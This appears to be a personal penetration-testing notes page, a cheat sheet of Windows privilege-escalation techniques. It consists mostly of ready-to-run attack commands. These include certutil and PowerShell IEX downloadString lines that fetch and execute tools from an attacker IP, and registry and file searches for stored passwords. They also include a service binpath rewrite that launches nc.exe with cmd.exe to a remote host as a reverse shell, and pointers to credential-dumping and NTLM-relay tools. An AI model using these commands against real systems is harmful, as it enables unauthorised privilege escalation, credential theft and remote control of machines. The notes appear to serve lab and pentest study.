Windows Priv Esc

https://github.com/carlospolop/PEASS-ng/releases/download/20221023/winPEASx64_ofs.exe
A guide for windows penetration testing - Rogue SecurityRogue Security

When serving files to be downloaded on win machines do python3 -m http.server 80 as it doesn't work on 9000

on the Win machine do:

certutil.exe -urlcache -f http://atackingIP/winpeas.exe winpeas.exe

https://github.com/carlospolop/PEASS-ng/releases/download/20220214/winPEASx64.exe

Search for programs path that are unquoted. That means that we can tamper and include a malicious exe in that path to the file and it will be automatically executed if that file is on auto schedule.

systeminfo

  • To gather various information about the system

Run the Sherlock Powershell script to search for priv esc opportunities

Execute Sherlock script on the affected system by running the following Powershell cmd…

IEX(New-Object Net.Webclient).downloadString('http://10.10.14.2:8000/Sherlock.ps1')

IEX - Invoke expression

8000 - because we are hosting it on our system with python -m SimpleHTTPServer

10.10.14.2 - this is our attacking system's IP in this case

  • pass the hash

Enumerate Powershell version

$PSVersionTable.PSVersion

FuzzySecurity | Windows Privilege Escalation Fundamentals

How to view hidden files I n windows

attrib

Windows Exploit Suggester (python script)

./windows-exploit-suggester.py --update

  • first update the database

./windows-exploit-suggester.py --database <name of database file (from the above command)> -- systeminfo <path to systeminfo text file>

LogoGitHub - Vedant-Bhalgama/Access-Token-Manipulation-POC: A repo containing the source code used in my video on Access Token ManipulationGitHub

Check for missing patches on the system

wmic qfe get Caption,Description,HotFixID,InstalledOn

  • use the above command to find the most recently installed patches and hotfixes and compare them to a list of patches that have potential exploits available for them that relate to privilege escalation

    • you check exploit-db for this (on Kali)

run PowerUp (Will Schroeder)

checks many things including:

  • hijackable DLLs

  • unattended install files

  • modifiable services

  • unquoted service paths

  • AlwaysInstallElevated

  • and more

Look for creds on the system

Browser Creds (Metasploit)

enum_ie

enum_chrome

etc.

Putty, WinSCP, RDP creds

SessionGopher (FireEye)

run Hot Potato (foxglovesec)

NBNS spoof, fake WPAD proxy, HTTP>NTLM Relay

-----------------------------------------------------------------------------------------------------

// What system are we connected to?

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

// Get the hostname and username (if available)

hostname

echo %username%

// Get users

net users

net user [username]

// Networking stuff

ipconfig /all

// Printer?

route print

// ARP-arific

arp -A

// Active network connections

netstat -ano

// Firewall fun (Win XP SP2+ only)

netsh firewall show state

netsh firewall show config

// Scheduled tasks

schtasks /query /fo LIST /v

// Running processes to started services

tasklist /SVC

net start

// Driver madness

DRIVERQUERY

// WMIC fun (Win 7/8 -- XP requires admin)

wmic /?

# Use wmic_info script!

// WMIC: check patch level

wmic qfe get Caption,Description,HotFixID,InstalledOn

// Search pathces for given patch

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."

// AlwaysInstallElevated fun

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

// Other commands to run to hopefully get what we need

dir /s *pass* == *cred* == *vnc* == *.config*

findstr /si password *.xml *.ini *.txt

reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s

// Service permissions

sc query

sc qc [service_name]

// Accesschk stuff

accesschk.exe /accepteula (always do this first!!!!!) ***From my experience I must include this is every command

accesschk.exe -ucqv [service_name] (requires sysinternals accesschk!)

accesschk.exe -uwcqv "Authenticated Users" * (won't yield anything on Win 8)

accesschk.exe -ucqv [service_name]

accesschk.exe -ucqv * (everything)

// Find all weak folder permissions per drive.

accesschk.exe -uwdqs Users c:\

accesschk.exe -uwdqs "Authenticated Users" c:\

// Find all weak file permissions per drive.

accesschk.exe -uwqs Users c:\*.*

accesschk.exe -uwqs "Authenticated Users" c:\*.*

// Binary planting

sc config [service_name] binpath= "C:\nc.exe -nv [RHOST] [RPORT] -e C:\WINDOWS\System32\cmd.exe"

sc config [service_name] obj= ".\LocalSystem" password= ""

sc qc [service_name] (to verify!)

net start [service_name]

PreviousLocal Priv ExploitsNextWin Priv Esc II

Last updated